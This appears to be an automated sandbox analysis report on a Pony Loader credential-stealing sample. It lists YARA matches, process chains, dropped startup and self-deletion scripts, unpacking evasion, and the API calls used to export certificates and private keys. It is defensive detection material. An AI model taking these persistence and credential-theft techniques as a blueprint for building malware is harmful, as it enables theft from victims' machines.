Source: 12.1.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 12.1.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 10.2.Adnexal8.exe.4d141c2.1.raw.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 12.2.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR	Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_04B40D59	0_2_04B40D59
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_0041280A	1_2_0041280A
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_00402E46	1_2_00402E46
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_0041280A	1_1_0041280A
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_00402E46	1_1_00402E46
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_04B20D59	10_2_04B20D59
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_0041280A	12_2_0041280A
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_00402E46	12_2_00402E46
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_0041280A	12_1_0041280A
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_00402E46	12_1_00402E46

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: String function: 00401D69 appears 60 times
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: String function: 0040417C appears 118 times
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: String function: 00410D46 appears 36 times
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: String function: 00410C9E appears 38 times
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: String function: 00410E30 appears 84 times
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: String function: 00401D15 appears 48 times
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: String function: 00404131 appears 106 times
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: String function: 00401C8E appears 278 times
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: String function: 004052CA appears 32 times
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: String function: 00401D69 appears 60 times
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: String function: 0040417C appears 118 times
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: String function: 00410D46 appears 36 times
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: String function: 00410C9E appears 38 times
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: String function: 00410E30 appears 84 times
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: String function: 00401D15 appears 48 times
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: String function: 00404131 appears 106 times
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: String function: 00401C8E appears 278 times
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: String function: 004052CA appears 32 times

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_04B41491 NtProtectVirtualMemory,	0_2_04B41491
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_04B40A06 NtSetContextThread,	0_2_04B40A06
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_04B21491 NtProtectVirtualMemory,	10_2_04B21491
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_04B20A06 NtSetContextThread,	10_2_04B20A06

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000000.00000000.645443664.000000000042B000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameTohndiges5.exe vs 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Binary or memory string: OriginalFilenameTohndiges5.exe vs 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Adnexal8.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Adnexal8.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Virustotal: Detection: 73%
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Metadefender: Detection: 71%
Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	ReversingLabs: Detection: 89%

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

File read: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Jump to behavior

Source: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Section loaded: C:\Windows\SysWOW64\msvbvm60.dll			Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe'
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process created: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe'
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12537875.bat' 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Adnexal8.exe 'C:\Users\user\AppData\Roaming\Adnexal8.exe'
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process created: C:\Users\user\AppData\Roaming\Adnexal8.exe 'C:\Users\user\AppData\Roaming\Adnexal8.exe'
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process created: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe'	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12537875.bat' 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' '	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\Adnexal8.exe 'C:\Users\user\AppData\Roaming\Adnexal8.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process created: C:\Users\user\AppData\Roaming\Adnexal8.exe 'C:\Users\user\AppData\Roaming\Adnexal8.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12556453.bat' 'C:\Users\user\AppData\Roaming\Adnexal8.exe' '	Jump to behavior

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_00402896 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,	1_2_00402896
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_00402896 LookupPrivilegeValueA,GetCurrentProcess,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,	1_1_00402896
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_00402896 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,	12_2_00402896
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_00402896 LookupPrivilegeValueA,GetCurrentProcess,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,	12_1_00402896

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_0040D423 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,	1_2_0040D423
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_1_0040D423 CertOpenSystemStoreA,lstrcmpA,lstrcmpA,	1_1_0040D423
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_2_0040D423 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,	12_2_0040D423
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 12_1_0040D423 CertOpenSystemStoreA,lstrcmpA,lstrcmpA,	12_1_0040D423

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe

Jump to behavior

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

File created: C:\Users\user\AppData\Local\Temp\12537875.bat

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@16/4@0/1

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Code function: 1_2_0040A4C5 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,

1_2_0040A4C5

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Code function: 1_2_00402C05 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,

1_2_00402C05

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1316:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_01

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\12537875.bat' 'C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe' '

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Unpacked PE file: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Unpacked PE file: 12.2.Adnexal8.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Unpacked PE file: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Unpacked PE file: 12.2.Adnexal8.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;

Yara detected aPLib compressed binary

Show sources

Source: Yara match	File source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Adnexal8.exe.4d141c2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.Adnexal8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Adnexal8.exe.4d141c2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Adnexal8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.690187796.0000000004D14000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.649932554.0000000004C44000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.657098932.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_0040487E push 8E4735B3h; iretd	0_2_0040488A
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_0041CF05 pushad ; iretd	0_2_0041CF0A
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_0041DC29 push edx; iretd	0_2_0041DC33
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_0041C92D pushad ; iretd	0_2_0041C93A
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 0_2_00403EBB push 8E4735B3h; iretd	0_2_00403ECD
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_0040487E push 8E4735B3h; iretd	10_2_0040488A
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_0041CF05 pushad ; iretd	10_2_0041CF0A
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_0041DC29 push edx; iretd	10_2_0041DC33
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_0041C92D pushad ; iretd	10_2_0041C93A
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Code function: 10_2_00403EBB push 8E4735B3h; iretd	10_2_00403ECD

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Code function: 1_2_004106D5 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcatA,CreateFileA,lstrcpyA,StrRChrIA,lstrcpyA,CreateFileA,lstrlenA,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,

1_2_004106D5

Source: Adnexal8.exe.0.dr

Static PE information: real checksum: 0x2b004 should be: 0x2b00e

Source: initial sample	Static PE information: section name: .text entropy: 7.22855725445
Source: initial sample	Static PE information: section name: .text entropy: 7.22855725445

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

File created: C:\Users\user\AppData\Roaming\Adnexal8.exe

Jump to dropped file

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe

Jump to behavior

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adnexal8.vbe

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code

Show sources

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	File dump: 12537875.bat.1.dr 3880EEB1C736D853EB13B44898B718AB			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	File dump: 12556453.bat.12.dr 3880EEB1C736D853EB13B44898B718AB			Jump to dropped file

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Roaming\Adnexal8.exe	Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe

Code function: 1_2_004043DD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

1_2_004043DD

Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_00404C68 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,	1_2_00404C68
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_0040890D FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,	1_2_0040890D
Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe	Code function: 1_2_00404FD8 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,	1_2_00404FD8
